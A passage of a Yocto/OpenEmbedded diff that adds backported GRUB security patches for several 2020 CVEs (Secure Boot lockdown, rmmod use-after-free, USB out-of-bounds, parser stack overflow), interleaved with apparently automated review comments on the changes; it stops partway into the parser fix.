372+grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_lockdown) (const char *name,
373+ grub_extcmd_func_t func,
374+ grub_command_flags_t flags,
375+ const char *summary,
376+ const char *description,
377+ const struct grub_arg_option *parser);
378+
379 grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_prio) (const char *name,
380 grub_extcmd_func_t func,
381 grub_command_flags_t flags,
382diff --git a/include/grub/lockdown.h b/include/grub/lockdown.h
383new file mode 100644
384index 0000000..40531fa
385--- /dev/null
386+++ b/include/grub/lockdown.h
387@@ -0,0 +1,44 @@
388+/*
389+ * GRUB -- GRand Unified Bootloader
390+ * Copyright (C) 2020 Free Software Foundation, Inc.
391+ *
392+ * GRUB is free software: you can redistribute it and/or modify
393+ * it under the terms of the GNU General Public License as published by
394+ * the Free Software Foundation, either version 3 of the License, or
395+ * (at your option) any later version.
396+ *
397+ * GRUB is distributed in the hope that it will be useful,
398+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
399+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
400+ * GNU General Public License for more details.
401+ *
402+ * You should have received a copy of the GNU General Public License
403+ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
404+ */
405+
406+#ifndef GRUB_LOCKDOWN_H
407+#define GRUB_LOCKDOWN_H 1
408+
409+#include <grub/symbol.h>
410+
411+#define GRUB_LOCKDOWN_DISABLED 0
412+#define GRUB_LOCKDOWN_ENABLED 1
413+
414+#ifdef GRUB_MACHINE_EFI
415+extern void
416+EXPORT_FUNC (grub_lockdown) (void);
417+extern int
418+EXPORT_FUNC (grub_is_lockdown) (void);
419+#else
420+static inline void
421+grub_lockdown (void)
422+{
423+}
424+
425+static inline int
426+grub_is_lockdown (void)
427+{
428+ return GRUB_LOCKDOWN_DISABLED;
429+}
430+#endif
431+#endif /* ! GRUB_LOCKDOWN_H */
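--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch
@@ -0,0 +1,57 @@
+From bfb9c44298aa202c176fef8dc5ea48f9b0e76e5e Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Tue, 2 Feb 2021 19:59:48 +0100
+Subject: [PATCH] kern/lockdown: Set a variable if the GRUB is locked down
+
+It may be useful for scripts to determine whether the GRUB is locked
+down or not. Add the lockdown variable which is set to "y" when the GRUB
+is locked down.
+
+Suggested-by: Dimitri John Ledkov <xnox@ubuntu.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d90367471779c240e002e62edfb6b31fc85b4908]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 3 +++
+ grub-core/kern/lockdown.c | 4 ++++
+ 2 files changed, 7 insertions(+)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index d778bfb..5e6cace 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5802,6 +5802,9 @@ The GRUB can be locked down when booted on a secure boot environment, for exampl
+ if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
+ be restricted and some operations/commands cannot be executed.
+
++The @samp{lockdown} variable is set to @samp{y} when the GRUB is locked down.
++Otherwise it does not exit.
++
+ @node Platform limitations
+ @chapter Platform limitations
+
+diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
+index 1e56c0b..0bc70fd 100644
+--- a/grub-core/kern/lockdown.c
++++ b/grub-core/kern/lockdown.c
+@@ -18,6 +18,7 @@
+ */
+
+ #include <grub/dl.h>
++#include <grub/env.h>
+ #include <grub/file.h>
+ #include <grub/lockdown.h>
+ #include <grub/verify.h>
+@@ -71,6 +72,9 @@ grub_lockdown (void)
+ lockdown = GRUB_LOCKDOWN_ENABLED;
+
+ grub_verifier_register (&lockdown_verifier);
++
++ grub_env_set ("lockdown", "y");
++ grub_env_export ("lockdown");
+ }
+
+ int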
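Review bot: The two calls added to grub_lockdown(), `grub_env_set ("lockdown", "y");` and `grub_env_export ("lockdown");`, discard their return values and carry no comment saying the variable is informational only. The enforcement state shown on this page is the static `lockdown` int returned by grub_is_lockdown(); nothing in this hunk stops a script from changing or unsetting the environment variable, so configuration logic should not treat it as proof of lockdown. I would add `/* Informational for scripts only; enforcement relies on grub_is_lockdown(). */` above the calls and handle a failed grub_env_set() explicitly. The added grub.texi sentence "Otherwise it does not exit" reads like a typo for "exist" carried over from upstream.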
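--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch
@@ -0,0 +1,52 @@
+From 0d809c0979ced9db4d0e500b3e812bba95e52972 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:29 +0200
+Subject: [PATCH] efi: Lockdown the GRUB when the UEFI Secure Boot is enabled
+
+If the UEFI Secure Boot is enabled then the GRUB must be locked down
+to prevent executing code that can potentially be used to subvert its
+verification mechanisms.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=98b00a403cbf2ba6833d1ac0499871b27a08eb77]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/init.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+diff --git a/grub-core/kern/efi/init.c b/grub-core/kern/efi/init.c
+index 3dfdf2d..db84d82 100644
+--- a/grub-core/kern/efi/init.c
++++ b/grub-core/kern/efi/init.c
+@@ -20,6 +20,7 @@
+ #include <grub/efi/efi.h>
+ #include <grub/efi/console.h>
+ #include <grub/efi/disk.h>
++#include <grub/lockdown.h>
+ #include <grub/term.h>
+ #include <grub/misc.h>
+ #include <grub/env.h>
+@@ -39,6 +40,20 @@ grub_efi_init (void)
+ /* Initialize the memory management system. */
+ grub_efi_mm_init ();
+
++ /*
++ * Lockdown the GRUB and register the shim_lock verifier
++ * if the UEFI Secure Boot is enabled.
++ */
++ if (grub_efi_secure_boot ())
++ {
++ grub_lockdown ();
++ /* NOTE: Our version does not have the shim_lock_verifier,
++ * need to update below if added */
++#if 0
++ grub_shim_lock_verifier_setup ();
++#endif
++ }
++
+ efi_call_4 (grub_efi_system_table->boot_services->set_watchdog_timer,
+ 0, 0, 0, NULL);
+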
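Review bot: The `#if 0` around `grub_shim_lock_verifier_setup ();` in grub_efi_init() is a local departure from the backported commit, and its comment does not state the consequence. The lockdown verifier added by the earlier patch on this page sets `GRUB_VERIFY_FLAGS_DEFER_AUTH` for modules, kernels, ACPI tables and device trees, which presumably leaves their authentication to another registered verifier. With shim_lock absent, the patch should say which verifier fills that role in this build, or whether such loads are expected to be refused under Secure Boot. I would drop the dead `#if 0` block and, once confirmed, write the comment as `/* No shim_lock verifier in this GRUB version: deferred files need another verifier (e.g. pgp) to be loadable. */`. grub_efi_init() continues outside the hunk.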
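--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch
@@ -0,0 +1,158 @@
+From 1ad728b08ba2a21573e5f81a565114f74ca33988 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:33 +0200
+Subject: [PATCH] efi: Use grub_is_lockdown() instead of hardcoding a disabled
+ modules list
+
+Now the GRUB can check if it has been locked down and this can be used to
+prevent executing commands that can be utilized to circumvent the UEFI
+Secure Boot mechanisms. So, instead of hardcoding a list of modules that
+have to be disabled, prevent the usage of commands that can be dangerous.
+
+This not only allows the commands to be disabled on other platforms, but
+also properly separate the concerns. Since the shim_lock verifier logic
+should be only about preventing to run untrusted binaries and not about
+defining these kind of policies.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8f73052885892bc0dbc01e297f79d7cf4925e491]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 10 ++++++++++
+ grub-core/commands/i386/wrmsr.c | 5 +++--
+ grub-core/commands/iorw.c | 19 ++++++++++---------
+ grub-core/commands/memrw.c | 19 ++++++++++---------
+ 4 files changed, 33 insertions(+), 20 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 5e6cace..0786427 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5256,6 +5256,9 @@ only applies to the particular cpu/core/thread that runs the command.
+ Also, if you specify a reserved or unimplemented MSR address, it will
+ cause a general protection exception (which is not currently being handled)
+ and the system will reboot.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This is done to prevent subverting various security mechanisms.
+ @end deffn
+
+ @node xen_hypervisor
+@@ -5758,6 +5761,13 @@ security reasons. All above mentioned requirements are enforced by the
+ shim_lock module. And itself it is a persistent module which means that
+ it cannot be unloaded if it was loaded into the memory.
+
++All GRUB modules not stored in the @file{core.img}, OS kernels, ACPI tables,
++Device Trees, etc. have to be signed, e.g, using PGP. Additionally, the commands
++that can be used to subvert the UEFI secure boot mechanism, such as @command{iorw}
++and @command{memrw} will not be available when the UEFI secure boot is enabled.
++This is done for security reasons and are enforced by the GRUB Lockdown mechanism
++(@pxref{Lockdown}).
++
+ @node Measured Boot
+ @section Measuring boot components
+
+diff --git a/grub-core/commands/i386/wrmsr.c b/grub-core/commands/i386/wrmsr.c
+index 9c5e510..56a29c2 100644
+--- a/grub-core/commands/i386/wrmsr.c
++++ b/grub-core/commands/i386/wrmsr.c
+@@ -24,6 +24,7 @@
+ #include <grub/env.h>
+ #include <grub/command.h>
+ #include <grub/extcmd.h>
++#include <grub/lockdown.h>
+ #include <grub/i18n.h>
+ #include <grub/i386/cpuid.h>
+ #include <grub/i386/wrmsr.h>
+@@ -83,8 +84,8 @@ grub_cmd_msr_write (grub_command_t cmd __attribute__ ((unused)), int argc, char
+
+ GRUB_MOD_INIT(wrmsr)
+ {
+- cmd_write = grub_register_command ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"),
+- N_("Write a value to a CPU model specific register."));
++ cmd_write = grub_register_command_lockdown ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"),
++ N_("Write a value to a CPU model specific register."));
+ }
+
+ GRUB_MOD_FINI(wrmsr)
+diff --git a/grub-core/commands/iorw.c b/grub-core/commands/iorw.c
+index a0c164e..584baec 100644
+--- a/grub-core/commands/iorw.c
++++ b/grub-core/commands/iorw.c
+@@ -23,6 +23,7 @@
+ #include <grub/env.h>
+ #include <grub/cpu/io.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -131,17 +132,17 @@ GRUB_MOD_INIT(memrw)
+ N_("PORT"), N_("Read 32-bit value from PORT."),
+ options);
+ cmd_write_byte =
+- grub_register_command ("outb", grub_cmd_write,
+- N_("PORT VALUE [MASK]"),
+- N_("Write 8-bit VALUE to PORT."));
++ grub_register_command_lockdown ("outb", grub_cmd_write,
++ N_("PORT VALUE [MASK]"),
++ N_("Write 8-bit VALUE to PORT."));
+ cmd_write_word =
+- grub_register_command ("outw", grub_cmd_write,
+- N_("PORT VALUE [MASK]"),
+- N_("Write 16-bit VALUE to PORT."));
++ grub_register_command_lockdown ("outw", grub_cmd_write,
++ N_("PORT VALUE [MASK]"),
++ N_("Write 16-bit VALUE to PORT."));
+ cmd_write_dword =
+- grub_register_command ("outl", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 32-bit VALUE to PORT."));
++ grub_register_command_lockdown ("outl", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 32-bit VALUE to PORT."));
+ }
+
+ GRUB_MOD_FINI(memrw)
+diff --git a/grub-core/commands/memrw.c b/grub-core/commands/memrw.c
+index 98769ea..d401a6d 100644
+--- a/grub-core/commands/memrw.c
++++ b/grub-core/commands/memrw.c
+@@ -22,6 +22,7 @@
+ #include <grub/extcmd.h>
+ #include <grub/env.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -133,17 +134,17 @@ GRUB_MOD_INIT(memrw)
+ N_("ADDR"), N_("Read 32-bit value from ADDR."),
+ options);
+ cmd_write_byte =
+- grub_register_command ("write_byte", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 8-bit VALUE to ADDR."));
++ grub_register_command_lockdown ("write_byte", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 8-bit VALUE to ADDR."));
+ cmd_write_word =
+- grub_register_command ("write_word", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 16-bit VALUE to ADDR."));
++ grub_register_command_lockdown ("write_word", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 16-bit VALUE to ADDR."));
+ cmd_write_dword =
+- grub_register_command ("write_dword", grub_cmd_write,
+- N_("ADDR VALUE [MASK]"),
+- N_("Write 32-bit VALUE to ADDR."));
++ grub_register_command_lockdown ("write_dword", grub_cmd_write,
++ N_("ADDR VALUE [MASK]"),
++ N_("Write 32-bit VALUE to ADDR."));
+ }
+
+ GRUB_MOD_FINI(memrw)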
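Review bot: Only the write commands in the iorw.c and memrw.c hunks move to `grub_register_command_lockdown`, yet the added grub.texi paragraph says `iorw` and `memrw` "will not be available" under Secure Boot. The read commands registered just above them (the context lines ending in `options);`) stay on the ordinary registration path. Either the text should say that only the write commands are refused, or, if port and memory reads are also meant to be blocked, the read commands should use `grub_register_extcmd_lockdown`, which the earlier patch on this page adds. The lockdown wrappers test grub_is_lockdown() at registration time, so this relies on grub_lockdown() having run before these modules initialise; a one-line comment in each GRUB_MOD_INIT would record that. Both GRUB_MOD_INIT bodies begin outside their hunks.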
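--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-25632.patch
@@ -0,0 +1,90 @@
+From 7630ec5397fe418276b360f9011934b8c034936c Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Tue, 29 Sep 2020 14:08:55 +0200
+Subject: [PATCH] dl: Only allow unloading modules that are not dependencies
+
+When a module is attempted to be removed its reference counter is always
+decremented. This means that repeated rmmod invocations will cause the
+module to be unloaded even if another module depends on it.
+
+This may lead to a use-after-free scenario allowing an attacker to execute
+arbitrary code and by-pass the UEFI Secure Boot protection.
+
+While being there, add the extern keyword to some function declarations in
+that header file.
+
+Fixes: CVE-2020-25632
+
+Reported-by: Chris Coulson <chris.coulson@canonical.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7630ec5397fe418276b360f9011934b8c034936c]
+CVE: CVE-2020-25632
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/minicmd.c | 7 +++++--
+ grub-core/kern/dl.c | 9 +++++++++
+ include/grub/dl.h | 8 +++++---
+ 3 files changed, 19 insertions(+), 5 deletions(-)
+
+diff --git a/grub-core/commands/minicmd.c b/grub-core/commands/minicmd.c
+index 6bbce3128..fa498931e 100644
+--- a/grub-core/commands/minicmd.c
++++ b/grub-core/commands/minicmd.c
+@@ -140,8 +140,11 @@ grub_mini_cmd_rmmod (struct grub_command *cmd __attribute__ ((unused)),
+ if (grub_dl_is_persistent (mod))
+ return grub_error (GRUB_ERR_BAD_ARGUMENT, "cannot unload persistent module");
+
+- if (grub_dl_unref (mod) <= 0)
+- grub_dl_unload (mod);
++ if (grub_dl_ref_count (mod) > 1)
++ return grub_error (GRUB_ERR_BAD_ARGUMENT, "cannot unload referenced module");
++
++ grub_dl_unref (mod);
++ grub_dl_unload (mod);
+
+ return 0;
+ }
+diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c
+index 48eb5e7b6..48f8a7907 100644
+--- a/grub-core/kern/dl.c
++++ b/grub-core/kern/dl.c
+@@ -549,6 +549,15 @@ grub_dl_unref (grub_dl_t mod)
+ return --mod->ref_count;
+ }
+
++int
++grub_dl_ref_count (grub_dl_t mod)
++{
++ if (mod == NULL)
++ return 0;
++
++ return mod->ref_count;
++}
++
+ static void
+ grub_dl_flush_cache (grub_dl_t mod)
+ {
+diff --git a/include/grub/dl.h b/include/grub/dl.h
+index f03c03561..b3753c9ca 100644
+--- a/include/grub/dl.h
++++ b/include/grub/dl.h
+@@ -203,9 +203,11 @@ grub_dl_t EXPORT_FUNC(grub_dl_load) (const char *name);
+ grub_dl_t grub_dl_load_core (void *addr, grub_size_t size);
+ grub_dl_t EXPORT_FUNC(grub_dl_load_core_noinit) (void *addr, grub_size_t size);
+ int EXPORT_FUNC(grub_dl_unload) (grub_dl_t mod);
+-void grub_dl_unload_unneeded (void);
+-int EXPORT_FUNC(grub_dl_ref) (grub_dl_t mod);
+-int EXPORT_FUNC(grub_dl_unref) (grub_dl_t mod);
++extern void grub_dl_unload_unneeded (void);
++extern int EXPORT_FUNC(grub_dl_ref) (grub_dl_t mod);
++extern int EXPORT_FUNC(grub_dl_unref) (grub_dl_t mod);
++extern int EXPORT_FUNC(grub_dl_ref_count) (grub_dl_t mod);
++
+ extern grub_dl_t EXPORT_VAR(grub_dl_head);
+
+ #ifndef GRUB_UTIL
+--
+2.33.0
+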
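Review bot: The new guard `if (grub_dl_ref_count (mod) > 1)` in grub_mini_cmd_rmmod() uses a threshold of 1 without explaining it. The result of the following `grub_dl_unload (mod);` is discarded, so rmmod returns 0 even if unloading fails. Presumably the first reference is the one taken when the module was loaded explicitly, so a count above 1 means a dependent exists. Whether that holds for a module pulled in only as a dependency should be confirmed against grub_dl_ref(), which is not shown here. I would add `/* ref_count 1 is the module's own load reference; more means a dependent still uses it. */` above the check once confirmed; the function starts outside the hunk.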
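--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-25647.patch
@@ -0,0 +1,119 @@
+From 128c16a682034263eb519c89bc0934eeb6fa8cfa Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Fri, 11 Dec 2020 19:19:21 +0100
+Subject: [PATCH] usb: Avoid possible out-of-bound accesses caused by malicious
+ devices
+
+The maximum number of configurations and interfaces are fixed but there is
+no out-of-bound checking to prevent a malicious USB device to report large
+values for these and cause accesses outside the arrays' memory.
+
+Fixes: CVE-2020-25647
+
+Reported-by: Joseph Tartaro <joseph.tartaro@ioactive.com>
+Reported-by: Ilja Van Sprundel <ivansprundel@ioactive.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=128c16a682034263eb519c89bc0934eeb6fa8cfa]
+CVE: CVE-2020-25647
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/bus/usb/usb.c | 15 ++++++++++++---
+ include/grub/usb.h | 10 +++++++---
+ 2 files changed, 19 insertions(+), 6 deletions(-)
+
+diff --git a/grub-core/bus/usb/usb.c b/grub-core/bus/usb/usb.c
+index 8da5e4c74..7cb3cc230 100644
+--- a/grub-core/bus/usb/usb.c
++++ b/grub-core/bus/usb/usb.c
+@@ -75,6 +75,9 @@ grub_usb_controller_iterate (grub_usb_controller_iterate_hook_t hook,
+ grub_usb_err_t
+ grub_usb_clear_halt (grub_usb_device_t dev, int endpoint)
+ {
++ if (endpoint >= GRUB_USB_MAX_TOGGLE)
++ return GRUB_USB_ERR_BADDEVICE;
++
+ dev->toggle[endpoint] = 0;
+ return grub_usb_control_msg (dev, (GRUB_USB_REQTYPE_OUT
+ | GRUB_USB_REQTYPE_STANDARD
+@@ -134,10 +137,10 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+ return err;
+ descdev = &dev->descdev;
+
+- for (i = 0; i < 8; i++)
++ for (i = 0; i < GRUB_USB_MAX_CONF; i++)
+ dev->config[i].descconf = NULL;
+
+- if (descdev->configcnt == 0)
++ if (descdev->configcnt == 0 || descdev->configcnt > GRUB_USB_MAX_CONF)
+ {
+ err = GRUB_USB_ERR_BADDEVICE;
+ goto fail;
+@@ -172,6 +175,12 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+ /* Skip the configuration descriptor. */
+ pos = dev->config[i].descconf->length;
+
++ if (dev->config[i].descconf->numif > GRUB_USB_MAX_IF)
++ {
++ err = GRUB_USB_ERR_BADDEVICE;
++ goto fail;
++ }
++
+ /* Read all interfaces. */
+ for (currif = 0; currif < dev->config[i].descconf->numif; currif++)
+ {
+@@ -217,7 +226,7 @@ grub_usb_device_initialize (grub_usb_device_t dev)
+
+ fail:
+
+- for (i = 0; i < 8; i++)
++ for (i = 0; i < GRUB_USB_MAX_CONF; i++)
+ grub_free (dev->config[i].descconf);
+
+ return err;
+diff --git a/include/grub/usb.h b/include/grub/usb.h
+index 512ae1dd0..6475c552f 100644
+--- a/include/grub/usb.h
++++ b/include/grub/usb.h
+@@ -23,6 +23,10 @@
+ #include <grub/usbdesc.h>
+ #include <grub/usbtrans.h>
+
++#define GRUB_USB_MAX_CONF 8
++#define GRUB_USB_MAX_IF 32
++#define GRUB_USB_MAX_TOGGLE 256
++
+ typedef struct grub_usb_device *grub_usb_device_t;
+ typedef struct grub_usb_controller *grub_usb_controller_t;
+ typedef struct grub_usb_controller_dev *grub_usb_controller_dev_t;
+@@ -167,7 +171,7 @@ struct grub_usb_configuration
+ struct grub_usb_desc_config *descconf;
+
+ /* Interfaces associated to this configuration. */
+- struct grub_usb_interface interf[32];
++ struct grub_usb_interface interf[GRUB_USB_MAX_IF];
+ };
+
+ struct grub_usb_hub_port
+@@ -191,7 +195,7 @@ struct grub_usb_device
+ struct grub_usb_controller controller;
+
+ /* Device configurations (after opening the device). */
+- struct grub_usb_configuration config[8];
++ struct grub_usb_configuration config[GRUB_USB_MAX_CONF];
+
+ /* Device address. */
+ int addr;
+@@ -203,7 +207,7 @@ struct grub_usb_device
+ int initialized;
+
+ /* Data toggle values (used for bulk transfers only). */
+- int toggle[256];
++ int toggle[GRUB_USB_MAX_TOGGLE];
+
+ /* Used by libusb wrapper. Schedulded for removal. */
+ void *data;
+--
+2.33.0
+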
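Review bot: The guard added to grub_usb_clear_halt(), `if (endpoint >= GRUB_USB_MAX_TOGGLE)`, checks only the upper bound although `endpoint` is a signed `int`. A negative value would still reach `dev->toggle[endpoint] = 0;` and write before the start of the array. I would write the check as `if (endpoint < 0 || endpoint >= GRUB_USB_MAX_TOGGLE)`. The `configcnt` and `numif` checks in grub_usb_device_initialize() match the array sizes now named in usb.h; most of that function's body lies outside the hunks.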
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27749.patch b/meta/recipes-bsp/grub/files/CVE-2020-27749.patch
new file mode 100644
index 0000000000..a2566b2ded
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27749.patch
@@ -0,0 +1,609 @@
1From 4ea7bae51f97e49c84dc67ea30b466ca8633b9f6 Mon Sep 17 00:00:00 2001
2From: Chris Coulson <chris.coulson@canonical.com>
3Date: Thu, 7 Jan 2021 19:21:03 +0000
4Subject: kern/parser: Fix a stack buffer overflow
5
6grub_parser_split_cmdline() expands variable names present in the supplied
7command line in to their corresponding variable contents and uses a 1 kiB
8stack buffer for temporary storage without sufficient bounds checking. If
9the function is called with a command line that references a variable with
10a sufficiently large payload, it is possible to overflow the stack
11buffer via tab completion, corrupt the stack frame and potentially
12control execution.
13
14Fixes: CVE-2020-27749
15
16Reported-by: Chris Coulson <chris.coulson@canonical.com>
17Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
18Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
19Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
20
21Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=c6c426e5ab6ea715153b72584de6bd8c82f698ec && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=b1c9e9e889e4273fb15712051c887e6078511448 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=3d157bbd06506b170fde5ec23980c4bf9f7660e2 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=8bc817014ce3d7a498db44eae33c8b90e2430926 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=030fb6c4fa354cdbd6a8d6903dfed5d36eaf3cb2 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=4ea7bae51f97e49c84dc67ea30b466ca8633b9f6]
22CVE: CVE-2020-27749
23
24Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
25---
26 grub-core/Makefile.core.def | 1 +
27 grub-core/kern/buffer.c | 117 +++++++++++++++++++++
28 grub-core/kern/parser.c | 204 +++++++++++++++++++++++-------------
29 include/grub/buffer.h | 144 +++++++++++++++++++++++++
30 4 files changed, 395 insertions(+), 71 deletions(-)
31 create mode 100644 grub-core/kern/buffer.c
32 create mode 100644 include/grub/buffer.h
33
34diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
35index 651ea2a..823cd57 100644
36--- a/grub-core/Makefile.core.def
37+++ b/grub-core/Makefile.core.def
38@@ -123,6 +123,7 @@ kernel = {
39 riscv32_efi_startup = kern/riscv/efi/startup.S;
40 riscv64_efi_startup = kern/riscv/efi/startup.S;
41
42+ common = kern/buffer.c;
43 common = kern/command.c;
44 common = kern/corecmd.c;
45 common = kern/device.c;
46diff --git a/grub-core/kern/buffer.c b/grub-core/kern/buffer.c
47new file mode 100644
48index 0000000..9f5f8b8
49--- /dev/null
50+++ b/grub-core/kern/buffer.c
51@@ -0,0 +1,117 @@
52+/*
53+ * GRUB -- GRand Unified Bootloader
54+ * Copyright (C) 2021 Free Software Foundation, Inc.
55+ *
56+ * GRUB is free software: you can redistribute it and/or modify
57+ * it under the terms of the GNU General Public License as published by
58+ * the Free Software Foundation, either version 3 of the License, or
59+ * (at your option) any later version.
60+ *
61+ * GRUB is distributed in the hope that it will be useful,
62+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
63+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
64+ * GNU General Public License for more details.
65+ *
66+ * You should have received a copy of the GNU General Public License
67+ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
68+ */
69+
70+#include <grub/buffer.h>
71+#include <grub/err.h>
72+#include <grub/misc.h>
73+#include <grub/mm.h>
74+#include <grub/safemath.h>
75+#include <grub/types.h>
76+
77+grub_buffer_t
78+grub_buffer_new (grub_size_t sz)
79+{
80+ struct grub_buffer *ret;
81+
82+ ret = (struct grub_buffer *) grub_malloc (sizeof (*ret));
83+ if (ret == NULL)
84+ return NULL;
85+
86+ ret->data = (grub_uint8_t *) grub_malloc (sz);
87+ if (ret->data == NULL)
88+ {
89+ grub_free (ret);
90+ return NULL;
91+ }
92+
93+ ret->sz = sz;
94+ ret->pos = 0;
95+ ret->used = 0;
96+
97+ return ret;
98+}
99+
100+void
101+grub_buffer_free (grub_buffer_t buf)
102+{
103+ grub_free (buf->data);
104+ grub_free (buf);
105+}
106+
107+grub_err_t
108+grub_buffer_ensure_space (grub_buffer_t buf, grub_size_t req)
109+{
110+ grub_uint8_t *d;
111+ grub_size_t newsz = 1;
112+
113+ /* Is the current buffer size adequate? */
114+ if (buf->sz >= req)
115+ return GRUB_ERR_NONE;
116+
117+ /* Find the smallest power-of-2 size that satisfies the request. */
118+ while (newsz < req)
119+ {
120+ if (newsz == 0)
121+ return grub_error (GRUB_ERR_OUT_OF_RANGE,
122+ N_("requested buffer size is too large"));
123+ newsz <<= 1;
124+ }
125+
126+ d = (grub_uint8_t *) grub_realloc (buf->data, newsz);
127+ if (d == NULL)
128+ return grub_errno;
129+
130+ buf->data = d;
131+ buf->sz = newsz;
132+
133+ return GRUB_ERR_NONE;
134+}
135+
136+void *
137+grub_buffer_take_data (grub_buffer_t buf)
138+{
139+ void *data = buf->data;
140+
141+ buf->data = NULL;
142+ buf->sz = buf->pos = buf->used = 0;
143+
144+ return data;
145+}
146+
147+void
148+grub_buffer_reset (grub_buffer_t buf)
149+{
150+ buf->pos = buf->used = 0;
151+}
152+
153+grub_err_t
154+grub_buffer_advance_read_pos (grub_buffer_t buf, grub_size_t n)
155+{
156+ grub_size_t newpos;
157+
158+ if (grub_add (buf->pos, n, &newpos))
159+ return grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected"));
160+
161+ if (newpos > buf->used)
162+ return grub_error (GRUB_ERR_OUT_OF_RANGE,
163+ N_("new read is position beyond the end of the written data"));
164+
165+ buf->pos = newpos;
166+
167+ return GRUB_ERR_NONE;
168+}
169diff --git a/grub-core/kern/parser.c b/grub-core/kern/parser.c
170index d1cf061..6ab7aa4 100644
171--- a/grub-core/kern/parser.c
172+++ b/grub-core/kern/parser.c
173@@ -1,7 +1,7 @@
174 /* parser.c - the part of the parser that can return partial tokens */
175 /*
176 * GRUB -- GRand Unified Bootloader
177- * Copyright (C) 2005,2007,2009 Free Software Foundation, Inc.
178+ * Copyright (C) 2005,2007,2009,2021 Free Software Foundation, Inc.
179 *
180 * GRUB is free software: you can redistribute it and/or modify
